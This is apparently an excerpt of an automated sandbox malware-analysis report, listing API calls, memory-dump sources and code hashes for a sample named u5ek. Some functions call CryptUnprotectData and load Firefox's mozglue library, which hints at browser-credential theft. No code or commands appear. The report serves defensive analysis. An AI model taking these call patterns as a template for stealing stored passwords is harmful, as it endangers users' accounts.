                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a10415128f82763c69118b784d5d9ef3f316688badd4acd86b2481b435ac45e2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27F1E3759142189ACB15FB61DC91EDE7739AF54304F8142DFA40A62091EF34AFC9CFA8
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BBB51DF
                                                                                                                                                                                                                              • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BBB529C
                                                                                                                                                                                                                              • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,00000000), ref: 6BBB52FF
                                                                                                                                                                                                                              • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BBB536D
                                                                                                                                                                                                                              • ?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(?,?), ref: 6BBB53F7
                                                                                                                                                                                                                                • Part of subcall function 6BBAAB89: EnterCriticalSection.KERNEL32(6BBFE370,?,?,?,6BB734DE,6BBFF6CC,?,?,?,?,?,?,?,6BB73284), ref: 6BBAAB94
                                                                                                                                                                                                                                • Part of subcall function 6BBAAB89: LeaveCriticalSection.KERNEL32(6BBFE370,?,6BB734DE,6BBFF6CC,?,?,?,?,?,?,?,6BB73284,?,?,6BB956F6), ref: 6BBAABD1
                                                                                                                                                                                                                              • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_RECORD_OVERHEADS), ref: 6BBB56C3
                                                                                                                                                                                                                              • __Init_thread_footer.LIBCMT ref: 6BBB56E0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              • MOZ_PROFILER_RECORD_OVERHEADS, xrefs: 6BBB56BE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BaseDurationPlatformSeconds@TimeUtils@mozilla@@$CriticalSection$EnterInit_thread_footerLeavegetenv
                                                                                                                                                                                                                              • String ID: MOZ_PROFILER_RECORD_OVERHEADS
                                                                                                                                                                                                                              • API String ID: 1227157289-345010206
                                                                                                                                                                                                                              • Opcode ID: cdbb1a5b6b02c140cbc2179cd59feef36a303ad0fc2c82918e3d1d5f53102c2a
                                                                                                                                                                                                                              • Instruction ID: 4e08f8d0e1108a5ea717430d88f4fd9b2ffdf896d95aa72c438a98fdb339e8f5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdbb1a5b6b02c140cbc2179cd59feef36a303ad0fc2c82918e3d1d5f53102c2a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C5E17F71814F858AC712DF34C86026BB7B6BF9B390F109B4EE8AF2B550DF75E4468612
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 6BB89B80: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,6BBDB92D), ref: 6BB89BC8
                                                                                                                                                                                                                                • Part of subcall function 6BB89B80: __Init_thread_footer.LIBCMT ref: 6BB89BDB
                                                                                                                                                                                                                              • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6BB803D4,?), ref: 6BBDB955
                                                                                                                                                                                                                              • NtQueryVirtualMemory.NTDLL ref: 6BBDB9A5
                                                                                                                                                                                                                              • NtQueryVirtualMemory.NTDLL ref: 6BBDBA20
                                                                                                                                                                                                                              • RtlNtStatusToDosError.NTDLL ref: 6BBDBA7B
                                                                                                                                                                                                                              • RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6BBDBA81
                                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,?,00000000,?,0000001C,00000000), ref: 6BBDBA86
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Error$LastMemoryQueryVirtual$InfoInit_thread_footerStatusSystemWin32rand_s
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1753913139-0
                                                                                                                                                                                                                              • Opcode ID: d5e276f3bc2f0f3f9fa0bbc462ea0f316264a37fd27e5c2845a4cc74d73e9d7f
                                                                                                                                                                                                                              • Instruction ID: 2c2ae642868e371d643a84973ea31d089baa58f537fbbee88465c3e201d101f4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d5e276f3bc2f0f3f9fa0bbc462ea0f316264a37fd27e5c2845a4cc74d73e9d7f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E517F75E01259DFDF28CFA8D881ADDBBB6EF88354F104129E905B7204DB38AD41CB91
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 6BBAFA80: GetCurrentThreadId.KERNEL32 ref: 6BBAFA8D
                                                                                                                                                                                                                                • Part of subcall function 6BBAFA80: AcquireSRWLockExclusive.KERNEL32(6BBFF448), ref: 6BBAFA99
                                                                                                                                                                                                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BBD1563), ref: 6BBB8BD5
                                                                                                                                                                                                                              • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6BBD1563), ref: 6BBB8C3A
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(-00000018,?,?,?,?,?,?,?,?,?,?,?,6BBD1563), ref: 6BBB8C74
                                                                                                                                                                                                                              • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,6BBD1563), ref: 6BBB8CBA
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6BBB8CCF
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExclusiveLockNow@Stamp@mozilla@@TimeV12@_free$AcquireCurrentReleaseThread
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2153970598-0
                                                                                                                                                                                                                              • Opcode ID: 88d79d09fd381faf6bfabe5404d0d903c5d1d658c93a8e0f885a1b1cbad5b218
                                                                                                                                                                                                                              • Instruction ID: 1e5e8d5b61ec57be252e1340b6f4b3f7ab14ddee3c9d890732183f0d14fe89a5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 88d79d09fd381faf6bfabe5404d0d903c5d1d658c93a8e0f885a1b1cbad5b218
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3D718F75A14B41CFD704CF29C88062AB7F1FF99314F459A9DE9899B362EB74E880CB41
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • NtQueryVirtualMemory.NTDLL ref: 6BB7F2B4
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6BB7F2F0
                                                                                                                                                                                                                              • NtQueryVirtualMemory.NTDLL ref: 6BB7F308
                                                                                                                                                                                                                              • RtlNtStatusToDosError.NTDLL ref: 6BB7F36B
                                                                                                                                                                                                                              • RtlSetLastWin32Error.NTDLL(00000000,00000000,000000FF,?,00000000,?,0000001C,?), ref: 6BB7F371
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorMemoryQueryVirtual$AddressLastProcStatusWin32
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1171715205-0
                                                                                                                                                                                                                              • Opcode ID: ea730f2ed7627d1ea5bb8c67a145828d9ace0c4cd7123eb1b5e5cccf6fd86718
                                                                                                                                                                                                                              • Instruction ID: a177a81e30b4fdf7de56a0d6365f0adebc86421e0c433c93c3518d2e939a5eb2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ea730f2ed7627d1ea5bb8c67a145828d9ace0c4cd7123eb1b5e5cccf6fd86718
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F217170A003C8EBEF30AA65DD95BEE77B8EB45358F014239E53096190D7BC9988C775
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 00418E46
                                                                                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00418E5B
                                                                                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(0041C690), ref: 00418E66
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00418E82
                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00418E89
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2579439406-0
                                                                                                                                                                                                                              • Opcode ID: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
                                                                                                                                                                                                                              • Instruction ID: 5828a94612e18b022276c58097a982c86e574ee0b254963d5fd3238681fe770b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1485600a89bc27f1a0a21c1cb01dd845070ad6051d0655c0ebfcb599f372d5e6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2D21C274A01304EFC721EF54F944B843BB4FB8C309F91907AE64987260E7B456868F9D
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000400,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660), ref: 00406C1D
                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C24
                                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00406C51
                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,?,?,?,?,`v@,80000001,h0A), ref: 00406C74
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,?,?,`v@,80000001,h0A,?,?,?,?,?,00407660,?), ref: 00406C7E
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3657800372-0
                                                                                                                                                                                                                              • Opcode ID: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
                                                                                                                                                                                                                              • Instruction ID: a62b9dfe9577ca48fe2f29d604933a8f18b811f44e231435f7e1fa1bbfb2df61
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 325183e0ff294f6bc8ca0bae0d01f1e1eb9720b9252a7c44d145ca839e0966ea
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01011275A40708BBEB20DF94CD45F9E7779EB44B05F104155F706FB2C0D670AA118BA9
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,000000FF,?), ref: 6BBE86AE
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                                              • Opcode ID: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
                                                                                                                                                                                                                              • Instruction ID: 0c0dfd281dddc1f6fe86e82705df4bfd1ec5bdd8cfddba9b067225d6b1c95de1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 020699a8d883c895cbf1e7bdb6619c7a9db3bf51279c0ce3409d4d95b83b76bf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C6C1C772E0015A8FDB24CF68CC917EDB7B2EF85314F1502A9C549EB355D734A98ACBA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,000000FF,80808082), ref: 6BBE8E18
                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6BBE925C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: memset
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2221118986-0
                                                                                                                                                                                                                              • Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                                                                                                                                                              • Instruction ID: 212922bab14ed61db5d2e5a0058fb440d1f1e85d258e10bee8b997875c0b6981
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1AA1D672E001568FDB24CE68CC817DDB7B2EF85314F1502B9C949EB395D734A99ACBA0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 004094CF
                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,00404BAE,00000000,?), ref: 004094E1
                                                                                                                                                                                                                              • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00404BAE,00000000,00000000), ref: 0040950A
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?,00404BAE,00000000,?), ref: 0040951F
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: BinaryCryptLocalString$AllocFree
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4291131564-0
                                                                                                                                                                                                                              • Opcode ID: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
                                                                                                                                                                                                                              • Instruction ID: 8ba321113e6e4d0cf3898c04bf9160a1f44f8cb9f34d86efd4b3c4bff5612467
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eb8266b658b0a36e64dba83ee5fc04eec02a97dd996390432438c79c58cdc735
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA119074240308AFEB14CF64CC95FAA77B6FB89711F208059FA159B3D0C7B5AA41CB94
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6BB803D4,?), ref: 6BBDB955
                                                                                                                                                                                                                              • NtQueryVirtualMemory.NTDLL ref: 6BBDB9A5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2206361073.000000006BB71000.00000020.00000001.01000000.00000011.sdmp, Offset: 6BB70000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206344630.000000006BB70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206437849.000000006BBED000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206456896.000000006BBFE000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2206481145.000000006BC02000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_6bb70000_u5ek.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: MemoryQueryVirtualrand_s
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1889792194-0
                                                                                                                                                                                                                              • Opcode ID: dc34dcb3abaf2b9974c0abd6a61a717082ed3a25c821a40d29c322c563819988
                                                                                                                                                                                                                              • Instruction ID: 73cc496bfc503a69e4a28af7330d42872cc8534897522a92869946cc2aedcf58
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc34dcb3abaf2b9974c0abd6a61a717082ed3a25c821a40d29c322c563819988
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF41D571E0025D9FDF18CFA8D891AEEB7B6EF88354F10812AE505A7344DB39AC45CB90
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000001.00000002.2158358289.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000001.00000002.2158358289.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_u5ek.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                              • Opcode ID: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
                                                                                                                                                                                                                              • Instruction ID: 5df7b21d12798ad2dd02b2714939a7e9e3589bb161cd2ca89e36415dbd51ea28
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55745e4d8ffa3bcd4bae6bd50e23aa08e34946fc70669168e917a1c48e4fa5ed
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE71E331494B009BD7633B32DD03ADA7AB27F04304F10596EB1FB20632DA3678E79A59
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • AcquireSRWLockExclusive.KERNEL32(6BBFF760), ref: 6BB819BD
                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32 ref: 6BB819E5
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BB81A27
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(?), ref: 6BB81A41
                                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,?), ref: 6BB81A4F
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BB81A92
                                                                                                                                                                                                                              • moz_xmalloc.MOZGLUE(?), ref: 6BB81AAC
                                                                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,?), ref: 6BB81ABA
                                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 6BB81C69
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6BB81C8F
                                                                                                                                                                                                                              • free.MOZGLUE(?), ref: 6BB81C9D
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 6BB81CAE
                                                                                                                                                                                                                              • ReleaseSRWLockExclusive.KERNEL32(6BBFF760), ref: 6BB81D52
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BB81DA5
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BB81DFB
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BB81E49
                                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 6BB81E68
                                                                                                                                                                                                                              • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BB81E9B
                                                                                                                                                                                                                                • Part of subcall function 6BB82070: LoadLibraryW.KERNEL32(combase.dll,6BB81C5F), ref: 6BB820AE
                                                                                                                                                                                                                                • Part of subcall function 6BB82070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6BB820CD
                                                                                                                                                                                                                                • Part of subcall function 6BB82070: __Init_thread_footer.LIBCMT ref: 6BB820E1
                                                                                                                                                                                                                              • memset.VCRUNTIME140(?,00000000,00000110), ref: 6BB81F15
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB81F46
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB81F52
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB81F59
                                                                                                                                                                                                                              • VerSetConditionMask.NTDLL ref: 6BB81F60
                                                                                                                                                                                                                              • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6BB81F6D
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
